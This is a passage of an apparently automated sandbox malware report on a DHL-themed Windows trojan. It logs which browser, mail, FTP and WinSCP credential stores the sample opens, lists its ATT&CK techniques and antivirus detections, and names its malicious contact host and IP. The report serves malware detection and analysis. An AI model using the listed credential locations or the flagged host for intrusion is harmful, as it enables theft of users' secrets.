                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Users\user\Desktop\DHL_1003671162.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Users\user\AppData\Roaming\qmUxKv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Users\user\AppData\Roaming\qmUxKv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: dump.pcap, type: PCAP
                      Source: Yara match File source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: DHL_1003671162.exe PID: 7812, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: qmUxKv.exe PID: 8168, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: boqXv.exe PID: 7736, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: boqXv.exe PID: 7196, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\DHL_1003671162.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.boqXv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.486f5a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1903974100.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2933907510.000000000337C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2933168050.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL_1003671162.exe PID: 7812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 7924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qmUxKv.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: boqXv.exe PID: 7196, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 131 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph: Behavior Graph ID: 1430783, Sample: DHL_1003671162.exe, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
DHL_1003671162.exe | 58% | Virustotal | | Browse
DHL_1003671162.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
DHL_1003671162.exe | 100% | Avira | HEUR/AGEN.1323731 |
DHL_1003671162.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | 100% | Avira | HEUR/AGEN.1323731 |
C:\Users\user\AppData\Roaming\qmUxKv.exe | 100% | Avira | HEUR/AGEN.1323731 |
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\qmUxKv.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe | 58% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\qmUxKv.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun |
C:\Users\user\AppData\Roaming\qmUxKv.exe | 58% | Virustotal | | Browse
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
mail.clslk.com | 2% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://mail.clslk.com | 100% | Avira URL Cloud | malware |
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe |
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | Virustotal | | Browse
http://www.founder.com.cn/cn/cThe | 0% | Virustotal | | Browse
http://www.zhongyicts.com.cn | 1% | Virustotal | | Browse
http://www.founder.com.cn/cn | 0% | Virustotal | | Browse
http://mail.clslk.com | 2% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.clslk.com | 50.87.253.239 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail.clslk.com | DHL_1003671162.exe, 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.fontbureau.com/designers/? | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://account.dyn.com/ | DHL_1003671162.exe, 00000000.00000002.1693256058.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1732952396.000000000486F000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1894023046.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DHL_1003671162.exe, 00000000.00000002.1690593567.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1728354948.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 0000000C.00000002.1839427071.000000000361A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000011.00000002.1901714817.0000000002623000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
50.87.253.239 | mail.clslk.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | true
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1430783
                                              Start date and time:2024-04-24 07:14:18 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 0s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
